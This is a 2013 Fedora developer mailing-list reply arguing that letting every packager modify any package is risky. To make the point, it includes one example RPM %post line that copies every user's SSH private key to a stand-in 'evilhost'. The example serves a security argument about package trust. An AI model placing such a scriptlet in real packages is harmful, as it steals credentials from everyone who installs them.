On Tue, May 14, 2013 at 11:45:40AM -0600, Kevin Fenzi wrote: > On Tue, 14 May 2013 17:13:54 +0000 > "Jóhann B. Guðmundsson" <johannbg@xxxxxxxxx> wrote: > > What really is needed here is to drop the user ownership module > > altogether and allow every contribute access to every component or > > use group ownership model on components instead followed by an email > > address component@fedoraproject which is the components email address > > and is stored in a imap folder. > > There's a number of problems with 'free for all' model. Mostly around > communication. I suspect the main one is someone putting: %post scp /home/*/.ssh/id_rsa evilhost: into a commonly used package, or something equivalent but more subtle than that. Basically you're giving root access to everyone with a FAS packager account (not that the current situation is that much better). Rich. -- Richard Jones, Virtualization Group, Red Hat http://people.redhat.com/~rjones Read my programming blog: http://rwmj.wordpress.com Fedora now supports 80 OCaml packages (the OPEN alternative to F#) -- devel mailing list devel@xxxxxxxxxxxxxxxxxxxxxxx https://admin.fedoraproject.org/mailman/listinfo/devel
